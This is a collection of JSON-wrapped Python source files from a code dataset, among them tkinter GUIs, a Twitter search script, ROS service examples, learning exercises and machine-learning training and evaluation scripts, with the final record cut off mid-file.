{"seq_id":"159238998","text":"s = '\\n' + ' Еще ''\\n' + ' q werty ' + '\\n' + '\\n' +' 123 45 7 8 9 0 ' + '\\n' + '\\n'\nprint(s)\n\ns = s.replace('\\n', ' ')\nwhile s.find('  ') != -1:\n    s = s.replace('  ', ' ')  # collapse runs of spaces\ns = s.split()\nprint(s)\nif s[0] == 'Еще':\n    s.pop(0)\nss = ''\ns = ' '.join(s)\nprint(s)\nprint(ss)\nprint(type(s))\n\n\n\n#\n# n = 3\n# m = 4\n# a = []\n# b = []\n# a.append(5)\n# a.append(6)\n# b.append(a)\n# a = []\n# a.append(45)\n# b.append(a)\n# print(a)\n# print(b)","sub_path":"basic/123.py","file_name":"123.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"133609854","text":"#!/usr/bin/env python\r\n# -*- encoding:utf-8 -*-\r\n# Reference URL: https://dev.twitter.com/rest/public/search\r\n\r\nfrom requests_oauthlib import OAuth1Session\r\nimport json\r\n\r\nCONSUMER_KEY = \"****\"\r\nCONSUMER_SECRET = \"****\"\r\nACCESS_TOKEN = '****'\r\nACCESS_TOKEN_SECRET = '****'\r\n\r\nqk = \"****\"\r\n\r\n# Write the results out to a file\r\nf = open(qk + '.txt', 'a')\r\n\r\nurl = \"https://api.twitter.com/1.1/search/tweets.json\"\r\n\r\n# Request parameters\r\nparams = {\"q\": qk,\r\n          \"count\":\"100\",\r\n          \"result_type\":\"recent\"}\r\n\r\n# GET with OAuth\r\ntwitter = OAuth1Session(CONSUMER_KEY, CONSUMER_SECRET, ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\r\nreq = twitter.get(url, params = params)\r\n\r\nif req.status_code == 200:\r\n    # The response is JSON, so parse it\r\n    timeline = json.loads(req.text)\r\n\r\n    i = 1\r\n    # Print the body of each tweet\r\n    for tweet in timeline[\"statuses\"]:\r\n        try:\r\n            print(tweet['text'])\r\n            print(\"------------------------\")\r\n\r\n            f.write(tweet['text'] + \"\\n\")\r\n            f.write(\"------------------------\\n\")\r\n            i = i + 1\r\n        except:\r\n            print(\"Error\")\r\n            print(\"------------------------\")\r\n\r\nelse:\r\n    # Error case\r\n    print(\"Error: %d\" % req.status_code)\r\n\r\nf.close()","sub_path":"search-twitter_oauth.py","file_name":"search-twitter_oauth.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"71081289","text":"#!/usr/bin/env python\n\nPROJECT = 'virtualenvwrapper-initproject'\nVERSION = '0.0.1'\n\n# Bootstrap installation of Distribute\nfrom setuptools import setup, find_packages\n\nsetup(\n    name=PROJECT,\n    version=VERSION,\n    author='Yannick Formaggio',\n    
author_email='yannick@thelumberjhack.org',\n url='',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'License :: OSI Approved :: WTPFL v2',\n 'Programming Language :: Python',\n 'Intended Audience :: Developers',\n 'Environment :: Console',\n ],\n platforms=['Any'],\n provides=['virtualenvwrapper.init_project'],\n requires=['virtualenv', 'virtualenvwrapper (>=2.0)'],\n description=(\n 'It creates a python project architecture,'\n 'setup.py, and initialize git repository while'\n 'creating new project using mkproject'\n ),\n long_description=open('README.md').read(),\n namespace_packages=['virtualenvwrapper'],\n packages=find_packages(),\n include_package_data=True,\n entry_points={\n 'virtualenvwrapper.project.post_mkproject': [\n 'user_scripts = virtualenvwrapper.init_project:post_mkproject',\n ]\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"336953085","text":"from tkinter import *\n\ndef left_click(event):\n frame1['bg'] = 'red'\n frame2['bg'] = 'white'\n frame3['bg'] = 'white'\n\n# еще один способ менять параметры виджета через метод configure\ndef middle_click(event):\n frame1.configure(bg='white')\n frame2.configure(bg='yellow')\n frame3.configure(bg='white')\n\ndef right_click(event):\n frame1['bg'] = 'white'\n frame2['bg'] = 'white'\n frame3['bg'] = 'blue'\n\nroot = Tk()\nroot.title('События мыши')\n\nroot.configure(bg='black')# задает параметры основного экрана\n\nframe1 = Frame(root, width=250, heigh=250, bg='white')\nframe2 = Frame(root, width=250, heigh=250, bg='white')\nframe3 = Frame(root, width=250, heigh=250, bg='white')\n\nframe1.grid(row=0, column=0)\nframe2.grid(row=0, column=1, padx=1, pady=2)# padx задает фрейму бардюры по оси x\nframe3.grid(row=0, column=2)\n\n# вызывает метод для главного окна, чтобы отработало нажатие мыши в любом месте виджета\nroot.bind('', left_click)\nroot.bind('', middle_click)\nroot.bind('', right_click)\nroot.mainloop()\n","sub_path":"tkinter_lesson_06_test.pyw","file_name":"tkinter_lesson_06_test.pyw","file_ext":"pyw","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"295254358","text":"'''\n\nGood morning! Here's your coding interview problem for today.\n\nThis problem was asked by Uber.\n\nGiven an array of integers, return a new array such that each element at index i of the new array is the product of all the numbers in the original array except the one at i.\n\nFor example, if our input was [1, 2, 3, 4, 5], the expected output would be [120, 60, 40, 30, 24]. 
If our input was [3, 2, 1], the expected output would be [2, 3, 6].\n\nFollow-up: what if you can't use division?\n'''\n\ntest_1 = [1, 2, 3, 4, 5]\ntest_2 = [3, 2, 1]\n\n\n# Problem solved with nested for loops.\ndef multiply_list(number_list):\n output_list = []\n for i in range(0, len(number_list)):\n curr = 1\n tmp_list = number_list.copy()\n tmp_list.pop(i)\n for j in range(0, len(tmp_list)):\n curr = curr * tmp_list[j]\n output_list.append(curr)\n return output_list\n\n\n# Attempting to solve this problem using recursion and without division.\ndef multiply_list_recurse(current_index, input_list=[], output_list=[]):\n if not current_index >= len(input_list):\n output_list.insert(current_index, 1)\n for i in range(0, len(input_list)):\n if not current_index == i:\n output_list[current_index] = output_list[current_index] * input_list[i]\n current_index += 1\n multiply_list_recurse(current_index, input_list, output_list)\n return output_list\n\n\n# Same as above, but without needing an index val passed.\ndef multiply_list_recurse_v2(input_list=[], output_list=[]):\n if not len(output_list) >= len(input_list):\n output_list.insert(len(output_list), 1)\n for i in range(0, len(input_list)):\n if not (len(output_list) - 1) == i:\n output_list[(len(output_list) - 1)] = output_list[(len(output_list) - 1)] * input_list[i]\n multiply_list_recurse_v2(input_list, output_list)\n return output_list\n\n\nprint(multiply_list(test_1))\nprint(multiply_list(test_2))\n\nprint(multiply_list_recurse(0, test_1, []))\nprint(multiply_list_recurse(0, test_2, []))\nprint(multiply_list_recurse(0, [], []))\n\nprint(multiply_list_recurse_v2(test_1, []))\nprint(multiply_list_recurse_v2(test_2, []))\nprint(multiply_list_recurse_v2([], []))","sub_path":"11-26.py","file_name":"11-26.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"217015057","text":"#!/usr/bin/env python\n\nimport roslib; roslib.load_manifest('smacha')\nimport rospy\nimport smach\nimport smach_ros\n\nfrom smacha_ros.srv import GripperSrv\nfrom smacha_ros.srv import GripperSrvRequest\nfrom smacha_ros.srv import GripperSrvResponse\nfrom geometry_msgs.msg import *\n\ndef gripper_srv(req):\n if req.max_effort > 5.0:\n print('gripper_srv() returning True')\n return GripperSrvResponse(True)\n else:\n print('gripper_srv() returning False')\n return GripperSrvResponse(False)\n\ndef main():\n rospy.init_node('smach_example_actionlib_service_state')\n \n # Register a gripper service\n s = rospy.Service('gripper_srv', GripperSrv, gripper_srv)\n\n # Create a SMACH state machine\n sm0 = smach.StateMachine(outcomes=['succeeded','aborted','preempted'])\n \n # Set userdata\n sm0.userdata.max_effort = 9.0\n sm0.userdata.position = Point()\n sm0.userdata.gripper_input = 9.0\n\n # Open the container\n with sm0:\n # Add states to the container\n\n # Empty request message\n smach.StateMachine.add('TRIGGER_GRIPPER_EMPTY_REQUEST',\n smach_ros.ServiceState('gripper_srv', GripperSrv),\n transitions={'succeeded':'TRIGGER_GRIPPER_FIXED_REQUEST'})\n\n # Fixed request message\n smach.StateMachine.add('TRIGGER_GRIPPER_FIXED_REQUEST',\n smach_ros.ServiceState('gripper_srv', GripperSrv,\n request = GripperSrvRequest(4.0, Point())),\n transitions={'succeeded':'TRIGGER_GRIPPER_USER_DATA_REQUEST'})\n\n # Request from user data\n smach.StateMachine.add('TRIGGER_GRIPPER_USER_DATA_REQUEST',\n smach_ros.ServiceState('gripper_srv', GripperSrv,\n request_slots = ['max_effort',\n 'position']),\n 
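# --- Hedged editor sketch (the standard answer to the follow-up in the
# problem record above, not part of the original; the helper name is
# ours). Prefix/suffix products give the division-free result in O(n)
# time, rather than the O(n^2) nested and recursive loops used in the
# record's solutions.
def products_except_self(nums):
    n = len(nums)
    out = [1] * n
    prefix = 1
    for i in range(n):               # out[i] = nums[0] * ... * nums[i-1]
        out[i] = prefix
        prefix *= nums[i]
    suffix = 1
    for i in range(n - 1, -1, -1):   # fold in nums[i+1] * ... * nums[n-1]
        out[i] *= suffix
        suffix *= nums[i]
    return out

# products_except_self([1, 2, 3, 4, 5]) == [120, 60, 40, 30, 24]
# products_except_self([3, 2, 1]) == [2, 3, 6]
# --- end sketch ---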
transitions={'succeeded':'TRIGGER_GRIPPER_REQUEST_CALLBACK'})\n\n # Request callback\n @smach.cb_interface(input_keys=['gripper_input'])\n def gripper_request_cb(userdata, request):\n gripper_request = GripperSrvRequest()\n gripper_request.position.x = 2.0\n gripper_request.max_effort = userdata.gripper_input\n return gripper_request\n\n smach.StateMachine.add('TRIGGER_GRIPPER_REQUEST_CALLBACK',\n smach_ros.ServiceState('gripper_srv', GripperSrv,\n request_cb = gripper_request_cb,\n input_keys = ['gripper_input']),\n transitions={'succeeded':'succeeded'})\n\n # Execute SMACH plan\n outcome = sm0.execute()\n\n rospy.signal_shutdown('All done.')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"smacha_ros/test/executive_smach_tutorials/smach_tutorials/examples/service_test.py","file_name":"service_test.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"284268598","text":"\"\"\"\nThis file serves as a evaluation interface for the network\n\"\"\"\n# Built in\nimport os\n# Torch\n\n# Own\nimport flag_reader\nfrom class_wrapper import Network\nfrom model_maker import Tandem\nimport data_reader\n\n# Libs\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef compare_truth_pred(pred_file, truth_file):\n \"\"\"\n Read truth and pred from csv files, compute their mean-absolute-error and the mean-squared-error\n :param pred_file: full path to pred file\n :param truth_file: full path to truth file\n :return: mae and mse\n \"\"\"\n pred = np.loadtxt(pred_file, delimiter=' ')\n truth = np.loadtxt(truth_file, delimiter=' ')\n\n mae = np.mean(np.abs(pred-truth), axis=1)\n mse = np.mean(np.square(pred-truth), axis=1)\n\n return mae, mse\n\n\ndef plotMSELossDistrib(pred_file, truth_file, flags):\n mae, mse = compare_truth_pred(pred_file, truth_file)\n plt.figure(figsize=(12, 6))\n plt.hist(mse, bins=100)\n plt.xlabel('Mean Squared Error')\n plt.ylabel('cnt')\n plt.suptitle('Tandem (Avg MSE={:.4e})'.format(np.mean(mse)))\n plt.savefig(os.path.join(os.path.abspath(''), 'data',\n 'Tandem_{}.png'.format(flags.eval_model)))\n plt.show()\n print('Tandem (Avg MSE={:.4e})'.format(np.mean(mse)))\n\ndef evaluate_from_model(model_dir):\n \"\"\"\n Evaluating interface. 1. Retreive the flags 2. get data 3. initialize network 4. 
eval\n :param model_dir: The folder to retrieve the model\n :return: None\n \"\"\"\n # Retrieve the flag object\n print(\"Retrieving flag object for parameters\")\n flags = flag_reader.load_flags(os.path.join(\"models\", model_dir))\n flags.eval_model = model_dir # Reset the eval mode\n flags.batch_size = 1 # For backprop eval mode, batchsize is always 1\n\n # Get the data\n train_loader, test_loader = data_reader.read_data(x_range=flags.x_range,\n y_range=flags.y_range,\n geoboundary=flags.geoboundary,\n batch_size=flags.batch_size,\n normalize_input=flags.normalize_input,\n data_dir=flags.data_dir)\n print(\"Making network now\")\n\n # Make Network\n ntwk = Network(Tandem, flags, train_loader, test_loader, inference_mode=True, saved_model=flags.eval_model)\n\n # Evaluation process\n print(\"Start eval now:\")\n pred_file, truth_file = ntwk.evaluate()\n\n # Plot the MSE distribution\n plotMSELossDistrib(pred_file, truth_file, flags)\n print(\"Evaluation finished\")\n\n\n\nif __name__ == '__main__':\n # Read the flag, however only the flags.eval_model is used and others are not used\n useless_flags = flag_reader.read_flag()\n\n print(useless_flags.eval_model)\n # Call the evaluate function from model\n evaluate_from_model(useless_flags.eval_model)\n\n","sub_path":"cGAN/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"340362088","text":"from gpiozero import Button, Buzzer\nfrom twython import Twython\nfrom time import sleep\nimport glob\nimport os\nfrom auth import (\n consumer_key,\n consumer_secret,\n access_token,\n access_token_secret\n)\nimport random\noneutton = Button(2)\ntwoutton = Button(3)\nthreeutton = Button(4)\nfourutton = Button(17)\nfiveutton = Button(27)\nsixutton = Button(26)\nbuzzer = Buzzer(22)\none = 0\ntwo = 0\nthree = 0\nfour = 0\nfive = 0\nsix = 0\nprint(\"Initiating\")\nbuzzer.off()\nsleep(5)\nfor i in range(10):\n print(\"Ready?\")\n sleep(random.randint(1,5))\n buzzer.on()\n while True:\n if(oneutton.is_pressed):\n print(\"Kian wins\")\n buzzer.off()\n one += 1\n break\n if(twoutton.is_pressed):\n print(\"Player 2 wins\")\n buzzer.off()\n two += 1\n break\n if(threeutton.is_pressed):\n print(\"Player 3 wins\")\n buzzer.off()\n three += 1\n break\n if(fourutton.is_pressed):\n print(\"Player 4 wins\")\n buzzer.off()\n four += 1\n break\n if(fiveutton.is_pressed):\n print(\"Player 5 wins\")\n buzzer.off()\n five +=1\n break\n if(sixutton.is_pressed):\n print(\"Player 6 wins\")\n buzzer.off()\n six +=1\n break\nwinner = max(one, two, three, four, five, six)\nwhile True:\n if(winner == one):\n print(\"Kian wins game\")\n twitter = Twython(consumer_key, consumer_secret, access_token, access_token_secret)\n message=\"Victory for Kian!\"\n twitter.update_status(status=message)\n print(\"Victory Tweeted. Check at @2Stanford2019\")\n break\n if(winner == two):\n print(\"Player 2 wins game\")\n twitter = Twython(consumer_key, consumer_secret, access_token, access_token_secret)\n message=\"Player 2 Victory!\"\n twitter.update_status(status=message)\n print(\"Victory Tweeted. Check at @2Stanford2019\")\n break\n if(winner == three):\n print(\"Player 3 wins game\")\n twitter = Twython(consumer_key, consumer_secret, access_token, access_token_secret)\n message=\"Player 3 Victory!\"\n twitter.update_status(status=message)\n print(\"Victory Tweeted. 
Check at @2Stanford2019\")\n break\n if(winner == four):\n print(\"Player 4 wins game\")\n twitter = Twython(consumer_key, consumer_secret, access_token, access_token_secret)\n message=\"Player 4 Victory!\"\n twitter.update_status(status=message)\n print(\"Victory Tweeted. Check at @2Stanford2019\")\n break\n if(winner == five):\n print(\"Player 5 wins game\")\n twitter = Twython(consumer_key, consumer_secret, access_token, access_token_secret)\n message=\"Player 5 Victory!\"\n twitter.update_status(status=message)\n print(\"Victory Tweeted. Check at @2Stanford2019\")\n break\n if(winner == six):\n print(\"Molly wins game\")\n imageFilenames = glob.glob('/home/pi/Desktop/*')\n newestImageFilename = max(imageFilenames, key=os.path.getctime)\n twitter = Twython(consumer_key, consumer_secret, access_token, access_token_secret)\n message=\"Victory for MA!\"\n with open(newestImageFilename, 'rb') as photo:\n twitter.update_status_with_media(status=message,media=photo)\n print(\"Victory Tweeted. Check at @2Stanford2019\")\n break\n else:\n pass\n \n","sub_path":"Button Game 6.py","file_name":"Button Game 6.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"239211559","text":"# Реализуйте базовый класс Car. У данного класса должны быть следующие атрибуты:\n# speed, color, name, is_police (булево). А также методы: go, stop, turn(direction), которые должны\n# сообщать, что машина поехала, остановилась, повернула (куда). Опишите несколько дочерних классов:\n# TownCar, SportCar, WorkCar, PoliceCar. Добавьте в базовый класс метод show_speed, который должен\n# показывать текущую скорость автомобиля. Для классов TownCar и WorkCar переопределите метод show_speed.\n# При значении скорости свыше 60 (TownCar) и 40 (WorkCar) должно выводиться сообщение о превышении\n# скорости.Создайте экземпляры классов, передайте значения атрибутов. Выполните доступ к атрибутам,\n# выведите результат. Выполните вызов методов и также покажите результат.\n\nfrom random import randint\n\n\nclass Car:\n def __init__(self, speed, color, name, is_police):\n self.color = color\n self.name = name\n self.speed = speed\n self.is_police = is_police\n\n def go(self):\n if self.is_police:\n return f\"Полицейская машина {self.name}, цвет {self.color}, начала движение.\"\n else:\n return f\"Машина {self.name}, цвет {self.color}, начала движение.\"\n\n def show_speed(self):\n return f\"Машина едет со скоростью {self.speed}км/ч.\"\n\n def stop(self):\n return f\"Машина {self.name} остановилась.\"\n\n def turn_direction(self):\n i = randint(1, 3)\n if i == 1:\n return f\"Машина повернула налево.\"\n elif i == 2:\n return f\"Машина поехала прямо.\"\n else:\n return f\"Машина повернула направо.\"\n\n\nclass SportCar(Car):\n def __init__(self, speed, color, name, is_police=False):\n super().__init__(speed, color, name, is_police)\n\n\nclass PoliceCar(Car):\n def __init__(self, speed, color, name, is_police=True):\n super().__init__(speed, color, name, is_police)\n\n\nclass TownCar(Car):\n def __init__(self, speed, color, name, is_police=False):\n super().__init__(speed, color, name, is_police)\n\n def show_speed(self):\n if self.speed > 60:\n return f\"Машина едет со скоростью {self.speed}км/ч.\" + \"\\033[1m\\033[31m {}\\033[0m\".format(\n \"Внимание! 
Вы превысили скорость!\")\n else:\n return f\"Машина едет со скоростью {self.speed}км/ч.\"\n\n\nclass WorkCar(Car):\n def __init__(self, speed, color, name, is_police=False):\n super().__init__(speed, color, name, is_police)\n\n def show_speed(self):\n if self.speed > 40:\n return f\"Машина едет со скоростью {self.speed}км/ч.\" + \"\\033[1m\\033[31m {}\\033[0m\".format(\n \"Внимание! Вы превысили скорость!\")\n else:\n return f\"Машина едет со скоростью {self.speed}км/ч.\"\n\n\ns = SportCar(120, \"красный\", \"'Астон Мартин'\")\nprint(s.go(), s.turn_direction(), '\\n' + s.show_speed(), s.stop(), '\\n')\np = PoliceCar(100, \"белый\", \"'Шевроле Круз'\")\nprint(p.go(), p.turn_direction(), '\\n' + p.show_speed(), p.stop(), '\\n')\nt = TownCar(70, \"чёрный\", \"'Дацун Мидо'\")\nprint(t.go(), t.turn_direction(), '\\n' + t.show_speed(), t.stop(), '\\n')\nw = WorkCar(50, \"оранжевый\", \"- цементовоз\")\nprint(w.go(), w.turn_direction(), '\\n' + w.show_speed(), w.stop(), '\\n')\n","sub_path":"lesson06/task04.py","file_name":"task04.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"484449455","text":"import tkinter as tk\nfrom tkinter import *\nfrom datetime import datetime\n\nscreen = tk.Tk(screenName=\"GadgetifyWithGSBlr Shopping\")\nscreen.geometry(\"1600x640\")\nscreen.title(\"GadgetifyWithGSBlr Shopping\")\nscreen.configure(bg=\"grey\")\n\nproduct_list = {\"JBL Basshead earphones: Rs. 1200\" : 1200, \"Bluetooth computer mouse: Rs. 600\": 600, \"HP Mouse: Rs. 200\":200, \n \"Realme 5 pro: Rs. 15000\": 15000, \"Sandisk Pendrive: Rs. 850\": 850}\n\n\n#getting the item purchased\n\ndef get_key(val):\n for key, value in product_list.items():\n if val == value:\n return key\n\n#creating the function \"gen_bill\" that generates the bill and creates a textfile of the same\n\ndef gen_bill():\n timestamp= datetime.now().strftime(\" %d %B %Y, %H:%M:%S \") + \"\\n\"\n shop_name= \" Shop name: GadgetifyWithGSBlr \" + \"\\n\"\n shop_address=\" shop address: 311/5 Akshay nagar, Bangalore, Karnataka, India \" + \"\\n\"\n shop_contact= \" Shop contact no: +91 9988776655 \" + \"\\n\\n\\n\"\n \n prod_pur=prod_select.get()\n name_bill=\"Name of the customer :- \" + name_entry.get() + \"\\n\"\n contact=\"Mobile of the customer :- \" + phone_entry.get() + \"\\n\"\n item_purchased = \"Item Purchased by the customer :- \" + get_key(prod_pur).split(\":\")[0] + \"\\n\"\n item_price = \"Price of the Item purchased:- Rs. \" + str(prod_pur) + \"\\n\"\n quan=\"Quantity of the item purchased:- \" + quantity_entry.get() + \"\\n\"\n pay_mode = \"Mode of Payment:- \" + mop_select.get() + \"\\n\"\n\n\n if(name_entry.get() == \"\" or phone_entry.get() == \"\" or quantity_entry.get() == \"\"):\n l2=Label(screen, text=\"Bill couldn't be generated due to one or more fields missing\", height = 2, width= 100, bg=\"#EA2511\" , fg= \"#050506\")\n l2.grid(row = 8, column= 0, columnspan=10)\n l2.after(3000, lambda: l2.destroy())\n\n else:\n #calculation of tax\n taxable_price =prod_pur* int(quantity_entry.get())\n tax = 0.06* taxable_price\n\n tax_charged= \"Tax on the Item purchased:- Rs. \" + str(tax) + \"\\n\"\n total_price= \"Final Price of the product:- Rs. 
\" + str(taxable_price + tax) + \"\\n\"\n\n file=open(str(name_entry.get()).split(\" \")[0], \"w\")\n file.write(timestamp)\n file.write(shop_name)\n file.write(shop_address)\n file.write(shop_contact)\n file.write(name_bill)\n file.write(contact)\n file.write(item_purchased)\n file.write(item_price)\n file.write(quan)\n file.write(tax_charged)\n file.write(total_price)\n file.write(pay_mode)\n file.close()\n l1=Label(screen, text=\"Bill generated Successfully....!!!\", height = 2, width= 100, bg=\"#2ECA12\" , fg= \"#DEF031\")\n l1.grid(row = 8, column= 0, columnspan=10)\n l1.after(3000, lambda: l1.destroy())\n \n #clearing fields\n name_entry.delete(0,END)\n phone_entry.delete(0,END)\n quantity_entry.delete(0,END)\n r1_mop.select()\n prod_select.set(1200)\n \n \n\n#create banner\nbanner = Label(screen, text= \"GadgetifyWithGSBlr Shopping Mall\", height = 3, width= 100, bg=\"#1282B6\", fg= \"#FFFFFF\")\nbanner.grid(row=0, column = 0, columnspan=10)\nbanner.config(font=(\"Courier\", 20))\n\n#create fields labels\n\nname = Label(screen, text= \"Name of the Customer\", height = 2, width = 30, bg=\"#1282B6\", fg= \"#FFFFFF\")\nphone = Label(screen, text= \"Mobile No.\", height = 2, width = 30, bg=\"#1282B6\", fg= \"#FFFFFF\")\nmode_of_pay = Label(screen, text= \"Payment Method\", height = 2, width = 30, bg=\"#1282B6\", fg= \"#FFFFFF\")\nitem = Label(screen, text= \"Item You want to Buy\", height = 2, width = 30, bg=\"#1282B6\", fg= \"#FFFFFF\")\nquantity = Label(screen, text= \"Quantity\", height = 2, width = 30, bg=\"#1282B6\", fg= \"#FFFFFF\")\n\n#placing labels on screen\n\nname.grid(row = 1, column= 0, pady = 10)\nphone.grid(row = 2, column= 0, pady = 10)\nmode_of_pay.grid(row = 3, column= 0, pady = 10)\nitem.grid(row = 4, column= 0, pady = 10)\nquantity.grid(row = 5, column= 0, pady = 10)\n\n#creating entry box, radio button\n\nname_entry = Entry(width= 40)\nphone_entry = Entry(width= 40)\nquantity_entry = Entry(width= 40)\n\nmop_select = tk.StringVar()\nr1_mop = Radiobutton(screen, text=\"Online Banking\", value=\"Online Banking\", width= 30, variable = mop_select)\nr2_mop = Radiobutton(screen, text=\"Cash\", value=\"Cash\", width= 30, variable = mop_select)\nr3_mop = Radiobutton(screen, text=\"Card\", value=\"Card\", width= 30, variable = mop_select)\nr1_mop.select()\n\n#placing entry box, radio button on screen\n\nname_entry.grid(row = 1, column = 1, pady=10, ipady=6)\nphone_entry.grid(row = 2, column = 1, pady=10, ipady=6)\nquantity_entry.grid(row = 5, column = 1, pady=10, ipady=6)\n\nr1_mop.grid(row = 3, column = 1, ipady=6)\nr2_mop.grid(row = 3, column = 2, ipady=6)\nr3_mop.grid(row = 3, column = 3, ipady=6)\n\n#creating radio buttons for products list\n\nprod_select= tk.IntVar(screen,1200)\ncount=1\nfor (k,v) in product_list.items():\n Radiobutton(screen, text = k, variable = prod_select, value = v, width =28).grid(row = 4, column = count, ipady= 6)\n count+=1\n\n#creating BuyNow Button and placing that to screen\n\nbuy_now = Button(screen, text=\"Buy Now\", command = gen_bill, width= 40, bg=\"#1282B6\", fg= \"#FFFFFF\")\nbuy_now.grid(row =7, column = 2, ipady=6, pady=10)\n\nscreen.mainloop()","sub_path":"Easy/1. 
Shopping Cart Problem/solutions/bagofcodes_AnshumaliShaw/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":5566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} {"seq_id":"357823008","text":"import sys\n\n\ndef solution(data):\n    masks = [0x0, 0x80, 0xE0, 0xF0, 0xF8]\n    bits = [0x0, 0x0, 0xC0, 0xE0, 0xF0]\n    while data:\n        for x in range(4, -1, -1):\n            if data[0] & masks[x] == bits[x]:\n                break\n        if x == 0 or len(data) < x:\n            return 0\n        for y in range(1, x):\n            if data[y] & 0xC0 != 0x80:\n                return 0\n        data = data[x:]\n    return 1\n\n\nif __name__ == \"__main__\":\n    n = int(sys.stdin.readline())\n    s = list(map(int, sys.stdin.readline().split(\" \")))\n    # line = [bin(i)[2:] for i in s]\n    # print(line)\n    res = solution(s)\n    # print(1 if res == 1 else 0)\n    print(res)\n","sub_path":"头条/problem4.py","file_name":"problem4.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} {"seq_id":"296292366","text":"num=int(input('Enter the number you want to check for primality: '))\r\n\r\nprimos=[]\r\n\r\n# a prime has exactly two divisors (1 and itself), so start counting from 2\r\nfor x in range(2, 101):\r\n    cont=0\r\n\r\n    for y in range(1, x+1):\r\n        if x%y==0:\r\n            cont+=1\r\n    if cont==2:\r\n        primos.append(x)\r\n\r\n# note: the list only covers the numbers from 2 to 100\r\nif num in primos:\r\n    print('{} is a prime number'.format(num))\r\nelse:\r\n    print('{} is not a prime number'.format(num))\r\n    \r\nind=int(input('If you want to see a list of prime numbers, type \"1\": '))\r\n\r\nif ind == 1:\r\n    print(primos)\r\n    print('OK, see you later!!')\r\nelse:\r\n    print('OK, see you later!!')","sub_path":"Python/Exercises/ex52.py","file_name":"ex52.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} {"seq_id":"419827158","text":"\"\"\"Relu\n\"\"\"\n\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nX = tf.placeholder(tf.float32)\n\nwith tf.name_scope('Relu'):\n    fx = tf.nn.relu(X)\n    tf.summary.scalar(\"f(x)\", tf.squeeze(fx))\n\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n\n    # Output graph\n    merged = tf.summary.merge_all()\n    writer = tf.summary.FileWriter(\"log/Relu/\", graph = sess.graph)\n    \n    # Run the initializer\n    sess.run(init)\n    \n    for step in range(-10,11):\n        a = tf.convert_to_tensor(step, dtype=tf.float32)\n        a_r = sess.run([a])\n        print(sess.run(a), sess.run(fx, feed_dict={X: a_r}))\n\n        sess.run(fx, feed_dict={X: a_r})\n        summary = sess.run(merged, feed_dict={X: sess.run([a])})\n        writer.add_summary(summary, step)\n\n# with tf.Session() as sess:\n    \n#     for step in range(-10,11):\n#         X = tf.convert_to_tensor(step, dtype=tf.float32)\n#         # X = tf.random_uniform([1,1], minval=1.0, maxval=3.0, seed=step) //Or use random number\n#         print(sess.run(X), sess.run(tf.nn.relu(X)))","sub_path":"src/TensorFlow/venv/Lab/Tutorials/Activation/Relu.py","file_name":"Relu.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} {"seq_id":"237450309","text":"# coding=utf-8\r\nimport torch\r\nfrom torch.autograd import Variable\r\nfrom bert_trigger.config import Config\r\nfrom bert_trigger import BertLstmCrf\r\nimport torch.optim as optim\r\nfrom .tri_utils import load_vocab, read_corpus_tr_id, load_model, save_model\r\nfrom torch.utils.data import TensorDataset\r\nfrom torch.utils.data import DataLoader\r\nimport tqdm\r\nimport argparse\r\n\r\n\r\ndef train(config=None):\r\n    \"\"\"Train 
Model\"\"\"\r\n # load config\r\n if not config:\r\n config = Config()\r\n print('settings:\\n', config)\r\n # load corpus\r\n print('loading corpus.')\r\n vocab = load_vocab(config.vocab)\r\n label_dic = load_vocab(config.tri_id_label_file)\r\n tagset_size = len(label_dic)\r\n # load train and dev dataset\r\n train_data = read_corpus_tr_id(config.tri_id_train_file, max_length=config.max_length, label_dic=label_dic, vocab=vocab)\r\n train_ids = torch.LongTensor([temp[0] for temp in train_data])\r\n train_masks = torch.LongTensor([temp[1] for temp in train_data])\r\n train_tags = torch.LongTensor([temp[2] for temp in train_data])\r\n train_dataset = TensorDataset(train_ids, train_masks, train_tags)\r\n train_loader = DataLoader(train_dataset, shuffle=True, batch_size=config.batch_size)\r\n\r\n dev_data = read_corpus_tr_id(config.tri_id_dev_file, max_length=config.max_length, label_dic=label_dic, vocab=vocab)\r\n dev_ids = torch.LongTensor([temp[0] for temp in dev_data])\r\n dev_masks = torch.LongTensor([temp[1] for temp in dev_data])\r\n dev_tags = torch.LongTensor([temp[2] for temp in dev_data])\r\n dev_dataset = TensorDataset(dev_ids, dev_masks, dev_tags)\r\n dev_loader = DataLoader(dev_dataset, shuffle=True, batch_size=config.batch_size)\r\n # init model\r\n model = BertLstmCrf(config.bert_path, tagset_size, config.bert_embedding, 